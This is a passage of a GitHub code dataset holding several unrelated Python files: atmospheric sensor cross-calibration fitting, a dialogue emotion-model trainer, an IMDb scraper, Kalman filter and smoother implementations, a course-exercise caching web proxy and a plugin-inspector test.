12th and 13th, 2017, \nMako's calibration was clearly off and so these flights are omitted.\n\nFor water concentration, the model is assumed to be a line \npassing through the origin and therefore only the slope needs to be tuned.\n\nFor the isotope ratios, the cross-cal model is assumed to be a polynomial \nfunction of Pic2-measured water concentration (q), the respective isotope \nratio delta value (del), and their cross term. The highest power for each of \nthese three terms is identified by minimizing the Beyesian Information \nCriterion. \n\nThe water concentration slopes and the linear coefficients for the optimized \npolynomial models are saved as *.csv files in this folder. Publication-ready \nfigures are also generated and saved in this folder.\n\nFunction list (ordered by relevance)\n=============\n\nget_fits: \n This fxn is run during a call to main, and calls all fxns below either \n directly or indirectly. Gets parameter fits and figures for both years.\n\nget_fits_singleyear: \n Called by 'get_fits()'.\n \nqxcal_modelfit:\n Tune the slope for a water concentration linear model. \n \nisoxcal_modelfit:\n Tune the coefficients for terms in an isotope ratio polynomial model with \n predictor variables q, del, and q*del.\n \nget_poly_terms:\n Generates a pd.DataFrame of all needed powers of predictor vars. Used by \n 'isoratioxcal_modelfit()'.\n \nmodel_isoxcal:\n Returns predictions for an isotope ratio cross-calibration model. E.g. \n once a candidate polynomial model has been identified and parameters \n tuned using 'isoxcal_modelfit()', this function will use the candidate \n function to generate cross-calibrated pic2 measurements.\n\ndraw_fitfig, model_residual_map: \n The two functions used to make the figures. 'draw_fitfig' is the main \n function. 'model_residual_map' generates a 2D map of model residuals \n that can be used as contour plots.\n\nget_wisperdata:\n Returns all WISPER data for a single ORACLES year.\n\"\"\"\n\n\n# Built in:\nimport os\nimport itertools\n\n# Third party:\nimport numpy as np # 1.19.2\nimport matplotlib.pyplot as plt # 3.3.2\nimport pandas as pd # 1.1.3\nimport statsmodels.api as sm # 0.12.0\n\n# My modules:\nimport oversampler\nimport qxcal_model\nimport isoxcal_model\n\n\n\n# ORACLES flight dates where WISPER took good data:\ndates2017_good = ['20170812','20170813','20170815','20170817','20170818',\n '20170821','20170824','20170826','20170828','20170830',\n '20170831','20170902']\ndates2018_good = ['20180927','20180930','20181003','20181007','20181010',\n '20181012','20181015','20181017','20181019','20181021',\n '20181023']\n\n\ndef get_wisperdata(year):\n \"\"\"\n Load all WISPER (q,dD,d18O) data for either 2017 or 2018 with good data \n and average the data into 8 second blocks before returning. 
\n Return as a pandas df.\n \n year: str, '2017' or '2018'.\n \"\"\"\n # Get paths to all data files for the input year:\n if year=='2017':\n dates_good = dates2017_good\n elif year=='2018':\n dates_good = dates2018_good\n \n path_data_dir = r\"./sensor_data/\" \n fnames = ['WISPER_pic1cal_%s.ict' % d for d in dates_good]\n paths_data = [path_data_dir+f for f in fnames]\n \n \n # Loop through each date and append data to a single pandas df:\n columns = ['h2o_tot1','h2o_tot2','dD_tot1',\n 'dD_tot2','d18O_tot1','d18O_tot2'] # Keep these data columns.\n wisper = pd.DataFrame({}, columns=columns) # Append all data here.\n for p in paths_data:\n data_temp = pd.read_csv(p) # Load.\n data_temp.replace(-9999, np.nan, inplace=True)\n # Average data into 8 s blocks before appending:\n data_blocked = data_temp.groupby(lambda x: np.round(x/8)).mean()\n wisper = wisper.append(data_blocked[columns], ignore_index=True)\n \n return wisper.dropna(how='any') # Drop missing values\n\n\n\ndef get_fits_singleyear(year, wisperdata):\n \"\"\"\n Get cross-cal models and fit parameters for water concentration and each \n isotope ratio for a single ORACLES year. Return as a dict of pandas.Series \n objects.\n \n Polynomial form of model for isotope ratios is identified by minimizing \n the Beyesian Information Criterion.\n \n year: str, '2017' or '2018'.\n \n wisperdata: pandas.DataFrame. Contains all WISPER data for the year.\n \"\"\" \n print(\"****************************************************\\n\"\n \"Cross-calibration fit parameters for ORACLES \"+year+\"\\n\"\n \"****************************************************\")\n \n\n ## Fitting humidity is straightforward:\n ##-----------------\n model_q = qxcal_model.fit(wisperdata, 'h2o_tot1', 'h2o_tot2')\n #print(model_q.summary())\n print('q\\n===')\n print('R2 = %f' % model_q.rsquared)\n\n\n ## Fitting the iso ratios requires polynomial model selection:\n ##-----------------\n def polyord_minBIC(wisperdata, iso):\n \"\"\"\n Using min Bayesian info criterion (BIC) to determine highest power \n (up to 5) of each predictor var and crossterm, for the chosen \n isotopologue. Returns a 3-tuple of ints, where each is the highest \n power to raise the predictor vars: logq, iso, and logq*iso. iso is \n either 'dD' or 'd18O':\n \"\"\"\n # Cartesian product of all poly orders up to 5:\n nord_list = list(itertools.product(range(1,6), range(1,6), range(1,6)))\n bic_list = []\n for nord in nord_list:\n model = isoxcal_model.fit(wisperdata, iso, nord) # Statsmodels results.\n bic_list.append(model.bic) # Append this run's BIC.\n # Combo of poly orders with the minimum BIC:\n return nord_list[np.argmin(bic_list)]\n\n # Find optimal polynomial orders for each iso ratio. 
Then re-run fit with \n # those poly orders:\n nord_dD = polyord_minBIC(wisperdata, 'dD')\n nord_d18O = polyord_minBIC(wisperdata, 'd18O')\n model_dD = isoxcal_model.fit(wisperdata, 'dD', nord_dD)\n model_d18O = isoxcal_model.fit(wisperdata, 'd18O', nord_d18O)\n \n #print(model_dD.summary())\n #print(model_d18O.summary())\n print('\\ndD\\n===')\n print('nord = % s' % str(nord_dD))\n print('R2 = %f' % model_dD.rsquared) \n print('\\nd18O\\n====')\n print('nord = % s' % str(nord_d18O))\n print('R2 = %f' % model_d18O.rsquared)\n\n\n ## Return parameter fits:\n return {'q':model_q.params, 'dD':model_dD.params, 'd18O':model_d18O.params}\n\n\n\ndef get_fits():\n \"\"\"\n Get cross-calibration formula fit parameters for water concentration and \n both isotopologues for both the 2017 and 2018 ORACLES years.\n \"\"\" \n \"\"\"\n ## Check that all WISPER files with calibrated Pic1 data are in the \n ## necessary directory, otherwise run calibration script to get them:\n ##----------------- \n # 'paths_data' should be the paths of all the files if they exist:\n datesall_good = (pic1cal.dates2017_good + \n pic1cal.dates2018_good) # All relevant P3 flight dates. \n path_data_dir = pic1cal.path_pic1caldir # directory with data files.\n fnames = ['WISPER_pic1cal_%s.ict' % d for d in datesall_good]\n paths_data = [path_data_dir+f for f in fnames]\n\n print(\"Checking that all WISPER 2017 and 2018 pic1-calibrated files \"\n \"exist. For any that don't, running code to get calibrated files.\") \n for i in range(len(datesall_good)):\n if os.path.isfile(paths_data[i]):\n continue\n else:\n pic1cal.calibrate_20172018_file(datesall_good[i])\n print(\"All files now exist, good to start cross-calibration fits.\")\n \"\"\" \n \n ## Fit parameters for each year:\n ##-----------------\n fitparams_2017 = get_fits_singleyear('2017', get_wisperdata('2017'))\n fitparams_2018 = get_fits_singleyear('2018', get_wisperdata('2018'))\n \n \n ## Save H2O xcal fit results to this folder:\n ##-----------------\n slope2017 = fitparams_2017['q']['h2o_tot2']\n slope2018 = fitparams_2018['q']['h2o_tot2']\n h2o_xcal_df = pd.DataFrame({'year':['2017','2018'], \n 'slope':[slope2017,slope2018]}, \n columns=['year','slope'])\n h2o_xcal_df.to_csv(\"h2o_xcal_results.csv\", index=False)\n \n\n ## Save H2O xcal fit results to this folder:\n ##-----------------\n def isoratio_xcal_to_csv(fitparams_s, fname):\n # fitparams_s: fit results as pd.Series.\n fitparams_df = pd.DataFrame({'predictor_var':fitparams_s.index,\n 'coeff':fitparams_s.values},\n columns=['predictor_var','coeff'])\n fitparams_df.to_csv(fname, index=False)\n \n isoratio_xcal_to_csv(fitparams_2017['dD'], \"dD_xcal_results_2017.csv\")\n isoratio_xcal_to_csv(fitparams_2017['d18O'], \"d18O_xcal_results_2017.csv\")\n isoratio_xcal_to_csv(fitparams_2018['dD'], \"dD_xcal_results_2018.csv\")\n isoratio_xcal_to_csv(fitparams_2018['d18O'], \"d18O_xcal_results_2018.csv\")\n \n\nif __name__ == '__main__':\n get_fits()","repo_name":"DeanHenze/WISPER_crosscal_models","sub_path":"pic2_xcal_fits.py","file_name":"pic2_xcal_fits.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71044703339","text":"import numpy as np, argparse, time, pickle, random\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom sklearn.metrics import f1_score, confusion_matrix, accuracy_score, 
classification_report, \\\n precision_recall_fscore_support\nfrom utils import person_embed\nfrom tqdm import tqdm\n\n\ndef train_or_eval_model_for_transfo_xl(model, loss_function, dataloader, epoch, cuda, args, optimizer=None, train=False):\n '''\n\n :param model:\n :param loss_function:\n :param dataloader: list of datasets,\n :param args:\n :param optimizer:\n :param train:\n :return:\n '''\n losses, preds, labels = [], [], []\n scores, vids = [], []\n\n\n assert not train or optimizer != None\n if train:\n model.train()\n # dataloader = tqdm(dataloader)\n else:\n model.eval()\n\n for dataset in dataloader:\n mems = None\n speaker_mask = None\n window_mask = None\n # if train:\n # dataset = tqdm(dataset)\n # cnt = 0\n for data in dataset:\n if train:\n optimizer.zero_grad()\n\n # cnt += 1\n # if cnt > 4:\n # exit()\n\n # text_ids, text_feature, speaker_ids, labels, umask = [d.cuda() for d in data] if cuda else data\n content_ids, label, content_mask, content_lengths, speaker_ids,_ = data\n # print(content_ids.size())\n # print(label.size())\n # print(content_mask.size())\n # print(content_lengths.size())\n # print(content_ids.size())\n # print(speaker_ids)\n # speaker_vec = person_embed(speaker_ids, person_vec)\n if cuda:\n content_ids = content_ids.cuda()\n content_mask = content_mask.cuda()\n speaker_ids = speaker_ids.cuda()\n content_lengths = content_lengths.cuda()\n label = label.cuda()\n\n if args.basemodel == 'transfo_xl':\n logits, mems = model(content_ids, mems, content_mask)\n elif args.basemodel in ['xlnet_dialog', 'xlnet']:\n logits, mems, speaker_mask, window_mask = model(content_ids = content_ids, mems = mems, content_mask = content_mask,\n content_lengths = content_lengths, speaker_ids = speaker_ids,\n speaker_mask = speaker_mask, window_mask = window_mask)\n\n loss = loss_function(logits, label)\n # print(speaker_mask.detach().cpu().numpy())\n # print(content_lengths)\n # print(speaker_ids)\n # print('------------------------------------------------------')\n\n\n label = label.cpu().numpy().tolist()\n pred = torch.argmax(logits, 1).cpu().numpy().tolist()\n # print(label)\n # print(pred)\n for l,p in zip(label, pred):\n if l != -1:\n preds.append(p)\n labels.append(l)\n losses.append(loss.item())\n # print(content_lengths)\n # print(mems[0].size())\n\n if train:\n loss_val = loss.item()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n if args.tensorboard:\n for param in model.named_parameters():\n writer.add_histogram(param[0], param[1].grad, epoch)\n optimizer.step()\n # torch.cuda.empty_cache()\n\n if preds != []:\n preds = np.array(preds)\n labels = np.array(labels)\n else:\n return float('nan'), float('nan'), [], [], float('nan'), [], [], [], [], []\n\n # print(preds.tolist())\n # print(labels.tolist())\n avg_loss = round(np.sum(losses) / len(losses), 4)\n avg_accuracy = round(accuracy_score(labels, preds) * 100, 2)\n if args.dataset_name in ['IEMOCAP', 'MELD', 'EmoryNLP']:\n avg_fscore = round(f1_score(labels, preds, average='weighted') * 100, 2)\n else:\n avg_fscore = round(f1_score(labels, preds, average='micro', labels = list(range(1,7))) * 100, 2)\n # del mems\n # print(list(preds))\n # print(list(labels))\n\n return avg_loss, avg_accuracy, labels, preds, avg_fscore\n","repo_name":"shenwzh3/DialogXL","sub_path":"DialogXL/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"92"} 
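+Editor's note (illustrative aside, not a dataset record): the DialogXL trainer record above drops padded utterances labeled -1 before computing accuracy and weighted F1. A minimal, self-contained sketch of that masking-plus-metric pattern, assuming only numpy and scikit-learn; masked_scores is a hypothetical helper, not from the repo:
+import numpy as np
+from sklearn.metrics import accuracy_score, f1_score
+
+def masked_scores(logits, labels, ignore_index=-1):
+    # Score predictions while ignoring padded positions, mirroring the
+    # label/pred filtering loop in the trainer above.
+    preds = np.argmax(logits, axis=1)      # same role as torch.argmax(logits, 1)
+    keep = labels != ignore_index          # drop positions labeled ignore_index
+    labels, preds = labels[keep], preds[keep]
+    acc = round(accuracy_score(labels, preds) * 100, 2)
+    f1 = round(f1_score(labels, preds, average='weighted') * 100, 2)
+    return acc, f1
+
+# Example: the two positions labeled -1 are excluded from both metrics.
+logits = np.array([[0.9, 0.1], [0.2, 0.8], [0.6, 0.4], [0.5, 0.5]])
+labels = np.array([0, 1, -1, -1])
+print(masked_scores(logits, labels))  # -> (100.0, 100.0)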
+{"seq_id":"27127433905","text":"# first create venv >> and activate\r\n# pip install requests\r\n# pip install bs4\r\n# pip install html5lib\r\n\r\nimport pandas as pd\r\nimport requests\r\nimport openpyxl\r\nfrom bs4 import BeautifulSoup\r\n\r\n# to load in the xsxl file we need to import openpyxl file and check the the no. of sheet with name \r\n\r\nexcel=openpyxl.Workbook() \r\n# print(excel.sheetnames)\r\nsheet=excel.active\r\n\r\nsheet.title ='Top rated Moives'\r\nprint(excel.sheetnames)\r\n\r\n# here we will create column name for excel\r\nsheet.append([\"Movie Rank\",\"Movie name\",\"year of Release\",\"IMDB rating\"])\r\n\r\n\r\ntry:\r\n source=requests.get('https://www.imdb.com/chart/top/')\r\n source.raise_for_status() # of the ther error 404 the if the web is present or not\r\n\r\n soup=BeautifulSoup(source.text,'html.parser')\r\n # print(soup)\r\n movies = soup.find('tbody',class_='lister-list').find_all('tr')\r\n # print(len(movies)) #250\r\n # print(movies) #this will give list\r\n\r\n for movie in movies:\r\n\r\n name=movie.find('td', class_='titleColumn').a.text\r\n # print(\"Movie_name>>>>>\",name)\r\n\r\n rank=movie.find('td',class_='titleColumn').get_text(strip=True).split('.')[0]\r\n # print(\"movie_Rank>>>>>>\",rank)\r\n\r\n year=movie.find('td',class_='titleColumn').find('span',class_=\"secondaryInfo\").text.strip('()')\r\n # print(\"Movie_year>>>>>>\",year)\r\n\r\n rating=movie.find('td',class_='ratingColumn imdbRating').strong.text\r\n # print(\"Movie_ratting>>>>>>\",rating)\r\n\r\n print(rank,name,year,rating)\r\n sheet.append([rank,name,year,rating])\r\n\r\n \r\nexcept Exception as e :\r\n print(e)\r\n\r\nexcel.save(\"IMDb top 250 movie rating.xlsx\")","repo_name":"koushilkp/IMDB_movie_rating","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17317450524","text":"'''用生成器实现reversed的功能'''\ndef myrev(string):\n if isinstance(string, str): #判断参数是否为字符串\n for x in range(len(string)-1, -1, -1): #从大到小迭代出字符串的序列号\n yield string[x]\n else:\n print('Argument in myrev() isn\\'t string')\n\nt = myrev('tomorrow morning')\nfor x in t:\n print(x, end = '')\n\n","repo_name":"sonichuang/My-py-file","sub_path":"生成器 实现reversed的方法new.py","file_name":"生成器 实现reversed的方法new.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17828050108","text":"import numpy as np\nfrom StateModel import Gaussian\nfrom itertools import tee\nfrom functools import partial\nfrom autograd import jacobian\nfrom MomentMatching import TaylorTransform\nimport logging\n\nFORMAT = \"[ %(funcName)10s() ] %(message)s\"\n\nlogging.basicConfig(filename='kalman_filter.log', level=logging.FATAL, format=FORMAT)\nlogger = logging.getLogger(__name__)\n\n\ndef pairwise(x):\n node, next_node = tee(x)\n next(node, None)\n yield zip(node, next_node)\n\n\nclass KalmanFilterSmoother:\n \"\"\"\n Implementation of nonlinear Gaussian filter/smoother.\n \"\"\"\n def __init__(self, moment_matching, system_model, meas_moment_matching=None):\n\n self.transform = moment_matching\n\n if meas_moment_matching is None:\n self.meas_transform = moment_matching\n else:\n self.meas_transform = meas_moment_matching\n self.transition = system_model.transition\n self.measurement = system_model.measurement\n self.transition_noise = system_model.system_noise.cov\n self.measurement_noise = 
system_model.measurement_noise.cov\n self.init_state = system_model.init_state\n self.dt = system_model.dt\n\n def predict(self, prior_state, t=None, u=None, *args, **kwargs):\n func = partial(self.transition, t=t, u=u)\n xx_mean, xx_cov, _ = self.transform(func, prior_state)\n xx_cov += self.transition_noise\n return Gaussian(xx_mean, xx_cov)\n\n def correct(self, state, meas, t=None, u=None, *args, **kwargs):\n func = partial(self.measurement, t=t, u=u)\n z_mean, z_cov, xz_cross_cov = \\\n self.meas_transform(func, state)\n\n z_cov += self.measurement_noise\n\n kalman_gain = np.linalg.solve(z_cov, xz_cross_cov.T).T\n meas = np.atleast_1d(meas)\n mean = state.mean + np.dot(kalman_gain, (meas - z_mean)) # equation 15 in Marc's ACC paper\n cov = state.cov - np.dot(kalman_gain, np.transpose(xz_cross_cov))\n\n return Gaussian(mean, cov)\n\n def smooth(self, state, next_state, t=None, u=None, *args, **kwargs):\n func = partial(self.transition, t=t, u=u)\n xx_mean, xx_cov, xx_cross_cov = self.transform(func, state)\n\n xx_cov += self.transition_noise\n\n J = np.linalg.solve(xx_cov, xx_cross_cov.T).T\n mean = state.mean + np.dot(J, (next_state.mean - xx_mean))\n cov = state.cov + J @ (next_state.cov - xx_cov) @ J.T\n\n return Gaussian(mean, cov)\n\n def kalman_filter(self, measurements, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n\n if prior_state is None:\n prior_state = self.init_state\n\n state = prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self.correct(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n def kalman_smoother(self, filtered_list, u=None, *args, **kwargs):\n reversed_filtered = reversed(filtered_list)\n N = len(filtered_list)\n t = (N-1) * self.dt\n\n result = []\n\n next_state = next(reversed_filtered).copy()\n result.append(next_state)\n for state in reversed_filtered:\n smoothed_state = self.smooth(state, next_state, t=t, u=u, *args, **kwargs)\n result.append(smoothed_state)\n next_state = smoothed_state.copy()\n t -= self.dt\n\n return list(reversed(result))\n\n\nclass IEKF(KalmanFilterSmoother):\n \"\"\"\n Implementation of the iterated Extended Kalman Filter in\n Bell and Cathey (1993) \"The Iterated Kalman Filter Update as a Gauss-Newton Method.\"\n \"\"\"\n def __init__(self, system_model, sys_dim):\n transform = TaylorTransform(dim=sys_dim)\n super().__init__(transform, system_model)\n\n def _iterated_update(self, state, meas, t=None, u=None, *args, **kwargs):\n x = state.mean\n P = state.cov\n for i in range(self.num_iter):\n h_i = self.measurement(state.mean, t, u)[0]\n H_i = jacobian(self.measurement, argnum=0)(state.mean, t, u)[0]\n z_mean = h_i - H_i @ (x - state.mean)\n z_cov = H_i @ P @ H_i.T + self.measurement_noise\n xz_cross_cov = P @ H_i.T\n\n kalman_gain = np.linalg.solve(z_cov, xz_cross_cov.T).T\n meas = np.atleast_1d(meas)\n mean = x + np.dot(kalman_gain, (meas - z_mean)) # equation 15 in Marc's ACC paper\n cov = P - np.dot(kalman_gain, np.transpose(xz_cross_cov))\n\n state = Gaussian(mean, cov)\n\n return state\n\n def __call__(self, measurements, num_iter=5, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n self.num_iter = num_iter\n if prior_state is None:\n prior_state = self.init_state\n\n state = 
prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self._iterated_update(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n\nclass IEKS(KalmanFilterSmoother):\n \"\"\"\n Implementation of the iterated Extended Kalman Smoother in\n Bell (1994) \"The iterated Kalman smoother as a Gauss-Newton method.\"\n \"\"\"\n def __init__(self, system_model, sys_dim):\n transform = TaylorTransform(dim=sys_dim)\n super().__init__(transform, system_model)\n self.f = system_model.transition\n self.h = system_model.measurement\n self.Df = jacobian(system_model.transition, argnum=0)\n self.Dh = jacobian(system_model.measurement, argnum=0)\n\n @staticmethod\n def _linearise(func, Df, x0):\n return lambda x, t, u: func(x0, t=t, u=u) + Df(x0, t=t, u=u) @ (x - x0)\n\n def _kalman_filter(self, measurements, prior_state=None, t_zero=0.0, u=None, *args, **kwargs):\n\n if prior_state is None:\n prior_state = self.init_state\n\n state = prior_state\n t = t_zero\n\n result_filter = []\n\n for i, measurement in enumerate(measurements):\n self.transition = self.f_list[i]\n self.measurement = self.h_list[i]\n pred_state = self.predict(prior_state, t=t, u=u, *args, **kwargs)\n logger.debug('{},{},{}'.format(prior_state, t, pred_state))\n corrected_state = self.correct(pred_state, measurement.squeeze(), t=t, u=u, *args, **kwargs)\n result_filter.append(corrected_state)\n t += self.dt\n prior_state = corrected_state\n\n return result_filter\n\n def _kalman_smoother(self, filtered_list, u=None, *args, **kwargs):\n reversed_filtered = reversed(filtered_list)\n N = len(filtered_list)\n t = (N-1) * self.dt\n\n result = []\n\n next_state = next(reversed_filtered).copy()\n result.append(next_state)\n i = len(filtered_list)-1\n for state in reversed_filtered:\n self.transition = self.f_list[i]\n smoothed_state = self.smooth(state, next_state, t=t, u=u, *args, **kwargs)\n result.append(smoothed_state)\n next_state = smoothed_state.copy()\n t -= self.dt\n i -= 1\n\n return list(reversed(result))\n\n def __call__(self, measurements, num_iter=5):\n # self.f_list = [self._linearise(self.f, self.Df, self.init_state.mean) for _ in measurements]\n # self.h_list = [self._linearise(self.h, self.Dh, self.init_state.mean) for _ in measurements]\n\n # First iteration\n filter_results = self.kalman_filter(measurements)\n smoother_results = self.kalman_smoother(filter_results)\n\n self.f_list = [self._linearise(self.f, self.Df, state.mean) for state in smoother_results]\n self.h_list = [self._linearise(self.h, self.Dh, state.mean) for state in smoother_results]\n\n for k in range(num_iter-1):\n\n # print(f'iteration: {k+1}/{num_iter}')\n filter_results = self._kalman_filter(measurements)\n smoother_results = self._kalman_smoother(filter_results)\n\n # Update linearisation points\n self.f_list = [self._linearise(self.f, self.Df, state.mean) for state in smoother_results]\n self.h_list = [self._linearise(self.h, self.Dh, state.mean) for state in smoother_results]\n \n return 
smoother_results","repo_name":"sanket-kamthe/EPyStateEstimator","sub_path":"Filters/KalmanFilter.py","file_name":"KalmanFilter.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"} +{"seq_id":"69952433259","text":"from socket import *\r\nimport sys\r\nimport time\r\nfrom _thread import*\r\n\r\nif len(sys.argv) <= 1:\r\n\tprint('Usage : \"python ProxyServer.py server_ip\"\\n[server_ip : It is the IP Address Of Proxy Server & Web server.')\r\n\tsys.exit(2)\r\n# Environment : Python 3.8\r\n# Create a server socket, bind it to a port and start listening\r\ntcpSerSock = socket(AF_INET, SOCK_STREAM)\r\n# Fill in start.\r\ntcpSerSock.bind(('', 65432))\r\ntcpSerSock.listen(5)\r\n# Fill in end.\r\ndef routine(tcpCliSock):\r\n\t# Strat receiving data from the client\r\n\tmessage = tcpCliSock.recv(1024).decode()\r\n\tprint(message)\r\n\t# Extract the filename from the given message\r\n\tprint(message.split()[1])\r\n\tfilename = message.split()[1].partition(\"/\")[2]\r\n\tprint(filename)\r\n\tfileExist = \"false\"\r\n\tfiletouse = \"/\" + filename\r\n\tprint(filetouse)\r\n\ttry:\r\n\t\t# Check wether the file exist in the cache\r\n\t\tf = open(filetouse[1:], \"r\")\r\n\t\toutputdata = f.read()\r\n\t\tfileExist = \"true\"\r\n\t\t# ProxyServer finds a cache hit and generates a response message\r\n\t\t\r\n\t\t# Fill in start.\r\n\t\tfor data in outputdata:\r\n\t\t\t\ttcpCliSock.send(data.encode())\r\n\t\t# Fill in end.\r\n\t\tprint('Read from cache')\r\n\t# Error handling for file not found in cache\r\n\texcept IOError:\r\n\t\tif fileExist == \"false\":\r\n\t\t\t# Create a socket on the proxyserver\r\n\t\t\tc = socket(AF_INET, SOCK_STREAM)\r\n\t\t\ttry:\r\n\t\t\t\t# Connect to the socket to port 80\r\n\t\t\t\thostname = filename.replace(\"www.\",\"\",1)\r\n\t\t\t\tc.connect((hostname, 80))\r\n\t\t\t\t# ask port 127.0.0.1:80 for the file requested by the client\r\n\t\t\t\trequest =\"GET \"+\" http://\" + filename + \" HTTP/1.0\\n\\n\" + \"Host: \" + hostname +\"\\n\\n\"\r\n\t\t\t\tc.send(request.encode())\r\n\t\t\t\t# receive the response \r\n\t\t\t\t# Fill in start.\r\n\t\t\t\thtml_file = c.recv(1024)\r\n\t\t\t\t# Fill in end.\r\n\t\t\t\t# Create a new file in the cache for the requested file.\r\n\t\t\t\t# Also send the response in the buffer to client socket and the corresponding file in the cache\r\n\t\t\t\ttmpFile = open(\"./\" + filename,\"wb\")\r\n\t\t\t\t# Fill in start.\r\n\t\t\t\ttmpFile.write(html_file)\r\n\t\t\t\ttmpFile.close()\r\n\t\t\t\ttmpFile = open(\"./\" + filename,\"rb\")\r\n\t\t\t\toutputdata = tmpFile.read()\r\n\t\t\t\ttcpCliSock.send(outputdata)\r\n\t\t\t\t# Fill in end.\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Illegal request\")\r\n\t\t\tc.close()\r\n\t\telse:\r\n\t\t\t# HTTP response message for file not found\r\n\t\t\t# Fill in start.\r\n\t\t\ttcpCliSock.send(\"HTTP/1.1 404 Not Found\\r\\n\".encode())\r\n\t\t\t# Fill in end.\r\n\t# Close the client and the server sockets. For testing multi-user, you should comment the tcpCliSock.close()\r\n\t#tcpCliSock.close()\r\n\r\n# Fill in start. 
Change this part, such that multi-users can connect to this proxy server\r\nwhile True:\r\n\tprint('Ready to serve...')\r\n\ttcpCliSock, addr = tcpSerSock.accept()\r\n\tprint('Received a connection from:', addr)\r\n\tstart_new_thread(routine,(tcpCliSock,))\r\ntcpSerSock.close()\r\n# Fill in end\r\n","repo_name":"Chia-Hung0/Computer-Network-2020spring","sub_path":"HW1/src/p2_b/proxy_server.py","file_name":"proxy_server.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"5320618117","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport os\nimport unittest\n\nimport sys\nfrom rspub.util import plugg\n\n\nclass TestInspector(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n def test_nothing(self):\n pass\n\n def test_application_home(self):\n application_home = plugg.APPLICATION_HOME\n self.assertTrue(application_home.endswith(\"rspub-core\"))\n\n def test_list_py_files_with_me(self):\n me = os.path.basename(__file__)\n found_myself = False\n for py_file in plugg.Inspector.list_py_files(\".\"):\n if py_file.endswith(me):\n found_myself = True\n break\n self.assertTrue(found_myself, \"Could not find %s in a py-file search from %s\" % (me, plugg.APPLICATION_HOME))\n\n def test_list_classes(self):\n me = self.__class__\n found_myself = False\n inspector = plugg.Inspector(stop_on_error=True)\n for cls in inspector.list_classes(plugg.APPLICATION_HOME):\n if cls == me:\n found_myself = True\n break\n self.assertTrue(found_myself, \"Could not find %s in a classes search from %s\" % (me, plugg.APPLICATION_HOME))\n\n # def test_list_py_files(self):\n # user_home = os.path.expanduser(\"~\")\n # for py_file in plugg.Inspector.list_py_files(\"rspub/util\", os.path.join(user_home, \"tmp\")):\n # print(py_file)\n #\n # def test_list_py_files_with_empty_string(self):\n # # searches APPLICATION_HOME\n # for py_file in plugg.Inspector.list_py_files(\"\"):\n # print(py_file)\n\n # def test_list_py_files_with_empty_None(self):\n # # searches APPLICATION_HOME\n # for py_file in plugg.Inspector.list_py_files(None):\n # print(py_file)\n #\n # def test_load_modules(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # user_home = os.path.expanduser(\"~\")\n # for module in inspector.load_modules(\"plugins\", os.path.join(user_home, \"tmp\")):\n # print(module)\n #\n # def test_list_classes_filtered(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # fs = [lambda cls: plugg.is_named(\"NameFilter\"),\n # plugg.from_module(\"py_test.filters\")]\n # directories = [\"plugins\", os.path.join(os.path.expanduser(\"~\"), \"tmp\")]\n # for cls in inspector.list_classes_filtered(fs, *directories):\n # print(cls)\n #\n # print (\"===================no filter\")\n # for cls in inspector.list_classes_filtered(None, *directories):\n # print(cls)\n #\n # def test_list_classes_filtered2(self):\n # inspector = plugg.Inspector(stop_on_error=False)\n # is_named = lambda cls: cls.__name__ == \"NameFilter\"\n # from_module = lambda cls: cls.__module__.startswith(\"py_test\")\n #\n # fs = [nor_(is_named, from_module)\n #\n # ]\n #\n # directories = [\"plugins\", os.path.join(os.path.expanduser(\"~\"), \"tmp\")]\n 
